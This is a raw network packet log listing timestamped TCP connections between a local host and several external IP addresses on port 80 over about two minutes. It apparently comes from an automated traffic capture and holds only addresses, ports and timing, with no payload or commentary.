                                                                                                                                                        Dec 5, 2024 05:38:28.843909025 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.846820116 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.846923113 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.846966982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.849802971 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.849941969 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.849984884 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.852754116 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.852840900 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.852883101 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.855606079 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.855720043 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.855763912 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.858397007 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.858519077 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.858568907 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.861166000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.861237049 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.861278057 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.864048004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.864149094 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.864188910 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.866586924 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.866684914 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.866750002 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.869254112 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.869348049 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.869390965 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.871877909 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.871980906 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.872025013 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.874445915 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.874547958 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.874597073 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.876974106 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.877111912 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.877161980 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.879497051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.879679918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.879724979 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.882031918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.882112026 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.882157087 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.884481907 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.884545088 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.884589911 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.886948109 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.887032032 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.887075901 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.889364004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.889480114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.889527082 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.891850948 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.891952991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.891997099 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.894319057 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.894488096 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.894531012 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.896770000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.074417114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.074455976 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.075169086 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.076040983 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.076080084 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.077404976 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.077564955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.077608109 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.078676939 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.078854084 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.078897953 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.080082893 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.080244064 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.080290079 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.081454992 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.081753016 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.081798077 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.083044052 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.083055973 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.083103895 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.084428072 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.084593058 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.084640026 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.085807085 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.085977077 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.086016893 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.087255001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.087412119 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.087456942 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.088655949 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.088835001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.088876963 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.090049982 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.090218067 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.090260029 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.142354012 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:51.517759085 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.637506008 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:51.637598038 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.643821001 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.763541937 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469074011 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469137907 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469150066 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469162941 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469204903 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469217062 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469228029 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469245911 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469295979 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469374895 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469384909 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469397068 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469415903 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469428062 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.589072943 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.589174032 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.589258909 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.593214035 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.644901991 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.661217928 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.661300898 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.661376953 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.665369987 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.665493965 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.665565014 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.673722029 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.673855066 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.673924923 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.682136059 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.682235956 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.682307959 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.690525055 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.690649986 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.690710068 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.699059963 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.699176073 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.699254990 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.707288027 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.709150076 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.709228039 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.715854883 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.716662884 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.716748953 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.724070072 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.724143982 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.724214077 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.732461929 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.732559919 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.732628107 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.764725924 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.764820099 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.764893055 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.768866062 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.816765070 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.853107929 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.853216887 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.853301048 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.855520964 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.855676889 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.855742931 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.860301018 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.860435009 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.860491037 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.863842010 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.863922119 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.865252972 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.984904051 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:09.505909920 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.625624895 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:09.625833035 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.641791105 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.761511087 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:10.722471952 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:10.722549915 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:11.145047903 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:11.264869928 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:12.166949987 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.286705971 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:12.286905050 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.298032999 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.417834044 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:13.388497114 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:13.388616085 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:13.801678896 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:13.921509027 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:14.820044041 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:15.691303015 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:15.691515923 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:15.691616058 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:15.742069006 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.757594109 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.877460957 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:16.882031918 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.892879009 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:17.012635946 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370517015 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370553970 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370662928 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:18.374785900 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:18.494450092 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:23.868241072 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:23.988081932 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:23.988157988 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:24.001055956 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:24.120820999 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293838978 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293853998 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293864965 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293879986 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293890953 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293900967 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293932915 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:25.294001102 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:25.505599022 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.523926973 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.643791914 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:26.643867970 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.656594992 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.776376963 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948327065 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948350906 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948363066 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948398113 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:27.948436975 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948447943 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948460102 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948474884 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:27.948503971 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:28.161062956 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.180582047 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.300503969 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:29.300633907 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.312206984 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.431969881 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:29.432007074 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771307945 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771481037 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771492004 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771502018 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771511078 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771518946 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771519899 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:30.771599054 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:30.817368984 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:31.836410046 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:31.956235886 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:31.956341982 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:32.014066935 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:32.134494066 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261049986 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261071920 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261082888 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261148930 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261161089 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261171103 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261243105 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261302948 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.261383057 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.268186092 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.387883902 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:38.764486074 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:38.884238005 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:38.888331890 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:38.896495104 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:39.016448021 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:39.986628056 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:39.986732006 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:40.395473957 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:40.515194893 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:41.416214943 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.536050081 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:41.536165953 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.548202038 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.667924881 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:42.635565042 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:42.635659933 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:43.052297115 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:43.172255039 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.071489096 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.191499949 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.191580057 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.202023029 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.321862936 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.321885109 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:45.288722992 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:45.288783073 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:45.708401918 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:45.828094006 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:46.726110935 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.845877886 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:46.845958948 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.853360891 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.973043919 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944267988 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944355965 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944401026 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:47.947345972 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:48.067071915 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:53.566272974 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:53.687287092 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:53.693330050 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:53.702259064 CET5001980192.168.2.63.33.130.190
